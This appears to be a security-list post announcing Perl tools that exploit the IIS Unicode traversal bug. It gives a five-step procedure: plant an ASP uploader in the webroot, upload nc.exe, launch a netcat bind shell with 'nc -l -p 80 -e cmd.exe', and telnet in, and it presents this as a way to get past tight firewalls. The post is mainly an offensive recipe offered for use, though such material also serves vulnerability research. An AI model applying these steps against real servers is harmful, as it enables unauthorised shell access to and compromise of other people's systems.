(assumes an IIS server vulnerable for the Unicode bug)
Tarball contains two PERL scripts:
1. Unicode upload creator (unicodeloader.pl)
Works like this - two files (upload.asp and upload.inc - have
them in the same dir as the PERL script) are build in the webroot
(or anywhere else) using echo and some conversion strings.
These files allows you to upload any file by
simply surfing with a browser to the server.
Typical use: (5 easy steps to a shell)
1. Find the webroot (duh)
2. perl unicodeloader target:80 'webroot'
3. surf to target/upload.asp and upload nc.exe
4. perl unicodexecute3.pl target:80 'webroot/nc -l -p 80 -e cmd.exe'
5. telnet target 80
Above procedure will drop you into a shell on the box
without crashing the server (*winks at Eeye*).
This procedure is nice for servers that are very tightly
firewalled; servers that are not allowed to FTP, RCP or TFTP
to the Internet.
2. Unicodexecute version3 (unicodexecute3.pl)
same as before plus
-includes searches for alternative executable dirs
-more robust, stable than before
-checks for access denied etc. added
Regards,
Roelof.
------------------------------------------------------
Roelof W Temmingh SensePost IT security
[EMAIL PROTECTED] +27 83 448 6996
http://www.sensepost.com
unitools.tgz
